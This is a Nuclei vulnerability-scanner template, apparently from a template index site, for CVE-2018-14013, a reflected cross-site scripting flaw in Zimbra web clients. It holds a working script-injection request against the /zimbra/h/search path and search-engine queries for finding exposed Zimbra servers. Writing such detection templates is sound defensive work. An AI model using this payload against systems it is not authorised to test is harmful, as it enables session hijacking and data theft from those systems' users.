Skip to content

Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting

ID: CVE-2018-14013

Severity: medium

Author: pikpikcu

Tags: cve,cve2018,xss,zimbra,synacor

Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.

id: CVE-2018-14013
info:
name: Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 is vulnerable to cross-site scripting via the AJAX and html web clients.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Upgrade to a version of Synacor Zimbra Collaboration Suite Collaboration that is equal to or greater than 8.8.11 to mitigate the vulnerability.
reference:
- https://wiki.zimbra.com/wiki/Zimbra_Security_Advisories
- https://bugzilla.zimbra.com/show_bug.cgi?id=109018
- https://bugzilla.zimbra.com/show_bug.cgi?id=109017
- https://nvd.nist.gov/vuln/detail/CVE-2018-14013
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-14013
cwe-id: CWE-79
epss-score: 0.0065
epss-percentile: 0.7936
cpe: cpe:2.3:a:synacor:zimbra_collaboration_suite:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: synacor
product: zimbra_collaboration_suite
shodan-query:
- http.title:"zimbra collaboration suite"
- http.title:"zimbra web client sign in"
fofa-query:
- title="zimbra web client sign in"
- title="zimbra collaboration suite"
google-query:
- intitle:"zimbra collaboration suite"
- intitle:"zimbra web client sign in"
tags: cve,cve2018,xss,zimbra,synacor
http:
- method: GET
path:
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '</script><script>alert(document.domain)</script>'
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100dd249ffa9ef543a1c1a177c75a2726ebe810ddd0d7084c14fc5f27b28d1abd34022001ca6538526bd7bdd9efc29cd4c276c6ffcb340adff90466a7c7126092c1ef07:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2018/CVE-2018-14013.yaml"

View on Github